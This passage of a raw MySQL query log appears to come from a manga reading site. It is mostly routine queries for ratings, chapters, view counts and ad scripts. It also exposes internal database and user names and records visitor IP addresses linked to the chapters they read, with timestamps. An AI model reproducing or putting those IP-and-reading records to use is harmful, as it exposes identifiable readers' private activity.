m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12724' 330651032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330651029 Quit 330651033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651032 Quit 330651033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330651033 Quit 330651031 Quit 330651034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330651034 Quit 330651035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651035 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '12724', '205.164.158.33', '2026-02-26 03:29:06', '2026-02-26 03:29:06') 330651036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330651036 Quit 330651037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330651037 Quit 330651035 Quit 330651038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330651039 Query select * FROM chapter_images where chapter_id = '12724' 330651038 Quit 330651039 Quit 330651040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330651040 Quit 330651041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330651041 Quit 330651043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651042 Quit 330651044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330651043 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330651044 Quit 330651045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330651045 Quit 330651043 Quit 330651046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330651047 Query select * FROM chapters where manga_id = '193' order by id desc 330651046 Quit 330651048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330651047 Quit 330651048 Quit 330651049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330651050 Quit 330651051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651049 Quit 330651051 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651051 Quit 330651052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330651052 Quit 330651053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330651053 Quit 330651054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330651054 Quit 330651055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330651055 Quit 330651056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330651056 Quit 330651057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330651057 Quit 330651058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330651058 Quit 330651059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330651059 Quit 330651060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330651060 Quit 330651061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330651061 Quit 330651062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330651062 Quit 330651063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330651063 Quit 330651064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330651064 Quit 330651065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330651065 Quit 330651066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330651066 Quit 330651067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330651067 Quit 330651068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330651068 Quit 330651069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330651069 Quit 330651070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330651070 Quit 330651071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330651071 Quit 330651072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330651072 Quit 330651073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330651073 Quit 330651074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330651074 Quit 330651075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330651075 Quit 330651076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330651076 Quit 330651077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330651077 Quit 330651078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330651078 Quit 330651079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330651079 Quit 330651080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330651080 Quit 330651081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330651081 Quit 330651082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330651082 Quit 330651083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330651083 Quit 330651084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330651084 Quit 330651085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330651085 Quit 330651086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330651086 Quit 330651087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330651087 Quit 330651088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330651088 Quit 330651089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330651089 Quit 330651090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330651090 Quit 330651091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330651091 Quit 330651092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330651092 Quit 330651093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330651093 Quit 330651094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330651094 Quit 330651095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330651095 Quit 330651096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330651096 Quit 330651097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330651097 Quit 330651098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330651098 Quit 330651099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330651099 Quit 330651100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330651100 Quit 330651101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330651101 Quit 330651102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330651102 Quit 330651103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330651103 Quit 330651104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330651104 Quit 330651105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330651105 Quit 330651106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330651106 Quit 330651107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330651107 Quit 330651108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330651108 Quit 330651109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330651109 Quit 330651110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330651110 Quit 330651111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330651111 Quit 330651112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330651112 Quit 330651113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330651113 Quit 330651114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330651114 Quit 330651115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330651115 Quit 330651116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330651116 Quit 330651117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330651117 Quit 330651118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330651118 Quit 330651119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330651119 Quit 330651120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330651120 Quit 330651121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330651121 Quit 330651122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330651122 Quit 330651123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330651123 Quit 330651124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330651124 Quit 330651125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330651125 Quit 330651126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330651126 Quit 330651127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330651127 Quit 330651128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330651128 Quit 330651129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330651129 Quit 330651130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330651130 Quit 330651131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330651131 Quit 330651132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330651132 Quit 330651133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330651133 Quit 330651134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330651134 Quit 330651135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330651135 Quit 330651136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330651136 Quit 330651137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330651137 Quit 330651138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330651138 Quit 330651139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330651139 Quit 330651140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330651140 Quit 330651141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330651141 Quit 330651142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330651142 Quit 330651143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330651143 Quit 330651144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330651144 Quit 330651145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330651145 Quit 330651146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330651146 Quit 330651147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330651147 Quit 330651148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330651148 Quit 330651149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330651149 Quit 330651150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330651150 Quit 330651151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330651151 Quit 330651152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330651152 Quit 330651153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330651153 Quit 330651154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330651154 Quit 260225 19:29:07 330651155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651155 Quit 330651156 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9079' and m.active = 1 330651156 Quit 330651157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651157 Query select * FROM chapters where id = '9079' 330651157 Quit 330651158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651158 Query select * FROM chapters where manga_id = '172' order by display_priority ASC, id desc 330651158 Quit 330651159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651159 Query Update chapters set view=view+1 where id = '9079' 330651159 Quit 330651160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651160 Query select * FROM chapters where id = '9079' 330651161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651161 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9079' and m.active = 1 330651160 Quit 330651161 Quit 330651162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651162 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('172', '9079', '47.79.205.64', 'mangaberri.com', '2026-02-26 03:29:07', '2026-02-26 03:29:07') 330651162 Quit 330651163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651163 Query select * FROM chapter_images where chapter_id = '9079' 330651163 Quit 330651164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651164 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '172' and m.active = 1 330651164 Quit 330651165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651165 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='172' and m.active = 1 AND (genres like '%Action%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%') ORDER BY RAND() limit 10 330651165 Quit 330651166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651166 Quit 330651167 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651167 Quit 330651168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651168 Quit 330651169 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651169 Quit 330651170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651170 Quit 330651171 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651171 Quit 330651172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651172 Quit 330651173 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651173 Quit 330651174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651174 Quit 330651175 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651175 Quit 330651176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651176 Quit 330651177 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9079' and m.active = 1 330651177 Quit 330651178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651178 Query select * FROM chapters where id = '9079' 330651178 Quit 330651179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651179 Query select * FROM chapters where manga_id = '172' order by display_priority ASC, id desc 330651179 Quit 330651180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651180 Query Update chapters set view=view+1 where id = '9079' 330651180 Quit 330651181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651181 Query select * FROM chapters where id = '9079' 330651181 Quit 330651182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651182 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9079' and m.active = 1 330651182 Quit 330651183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651183 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('172', '9079', '47.79.205.64', 'mangaberri.com', '2026-02-26 03:29:07', '2026-02-26 03:29:07') 330651183 Quit 330651184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651184 Query select * FROM chapter_images where chapter_id = '9079' 330651184 Quit 330651185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651185 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '172' and m.active = 1 330651185 Quit 330651186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651186 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='172' and m.active = 1 AND (genres like '%Action%' OR genres like '%Drama%' OR genres like '%Fantasy%' 